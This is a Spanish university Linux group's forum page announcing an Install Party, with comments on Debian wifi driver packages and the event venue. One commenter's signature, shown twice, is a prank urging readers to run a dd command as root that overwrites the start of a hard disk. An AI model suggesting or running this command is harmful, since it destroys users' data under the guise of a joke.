CRySoL GNU Install Party v3.2

DebianArco

Tengo el gusto de informaros de la celebración de la próxima Install Party de CRySoL que se celebrará en la Escuela Superior de Informática los días 22 y 23 (viernes y sábado).

La Install Party se orientará principalmente a los alumnos que cursen la asignatura Estructura de Computadores, teniendo preferencia para la asignación de puestos, aunque la party está abierta a todo el mundo.

Para confirmar asistencia (y reservar puesto) debéis mandar un correo a: mariajose.santofimia@uclm.es. Podéis indicar en el mail características especiales del hardware que vayáis a llevar.

Los requisitos mínimos serán 10GB de disco SIN PARTICIONAR (o una partición de 10GB que será la que usemos).

A lo largo de la semana iremos confirmando más talleres, de momento serán los siguientes:

  • Primera sesión (Viernes, 18:00h):
    • Instalación del sistema base. Primeros pasos.
    • Herramientas de desarrollo para NDS.
  • Segunda sesión (Sábado, 10:30h):
    • Herramientas de desarrollo para PSP.
    • Redes P2P. Torrentflux.

Comentarios

Opciones de visualización de comentarios

Seleccione la forma que prefiera para mostrar los comentarios y haga clic en «Guardar las opciones» para activar los cambios.

intel 3945abg

hola he estado en la install party y lo único que me quedo por instalar fue la wifi. He estado buscando por internet y en casi todas las páginas dicen que tengo que instalar los siguientes paquetes: ipw3945d, firmware-ipw3945, ipw3945-modules-$(uname -r). Pero a la hora de instalar el último me dice que no se encuentra.¿Podríais poner una receta para poder instalarla o por lo menos dar una solución?
Gracias y felicidades por la install

Imagen de Lk2

Lista de correo

Por favor, en la lista de correo estas cosas. La web es para publicar recetas, noticias y discutir sobre ellas.

¡Muchas gracias!

Imagen de int-0

Te puede pasar lo siguiente...

Cuando tu instalas ipw3945-modules-$(uname -r) realmente lo que haces es intalar el paquete para tu versión actual del kernel. Es fácil que ya no existan esos paquetes en la rama unstable (que es la que usamos en la party). Por tanto tendrías que ver cuál es la última versión del kernel que exista en debian (la más actual) para la cual exista el paquete, que creo q es la 2.6.22-3, es decir, instalate:

  • ipw3945d
  • firmware-ipw3945
  • ipw3945-modules-2.6.22-3-686
  • linux-image-2.6.22-3-686

Con eso creo que tendrás suficiente…
—————————————————————
For Happy Lusers! Try this as root!
dd if=/dev/zero of=/dev/hda bs=1G count=10
—————————————————————

------------------------------------------------------------
$ python -c "print 'VG9udG8gZWwgcXVlIGxvIGxlYSA6KQ==\n'.decode('base64')"
------------------------------------------------------------

Imagen de tato

¿En qué aula se va a

¿En qué aula se va a hacer?

Imagen de int-0

En principio Ld1, Ld2 y Ld3

Iremos ocupando los laboratorios según necesidad… aunque no esperamos llenar más de 2 (por falta de colaboradores)…
—————————————————————
For Happy Lusers! Try this as root!
dd if=/dev/zero of=/dev/hda bs=1G count=10
—————————————————————

------------------------------------------------------------
$ python -c "print 'VG9udG8gZWwgcXVlIGxvIGxlYSA6KQ==\n'.decode('base64')"
------------------------------------------------------------

Imagen de magmax

Me apunto

Hola, chicos.

Yo me apunto a la install. Por suerte en este caso, ya tengo mi Debian instalada y configurada Smiling

De todas maneras, si no tenéis inconveniente, me pasaré por allí el viernes en cuanto pueda y el sábado en la medida de lo posible.

Y si hago falta para ayudar en algo, aquí estoy Eye-wink


In a world without Walls and Fences, ¿who needs Windows or Gates?

Miguel Ángel García
http://magmax.org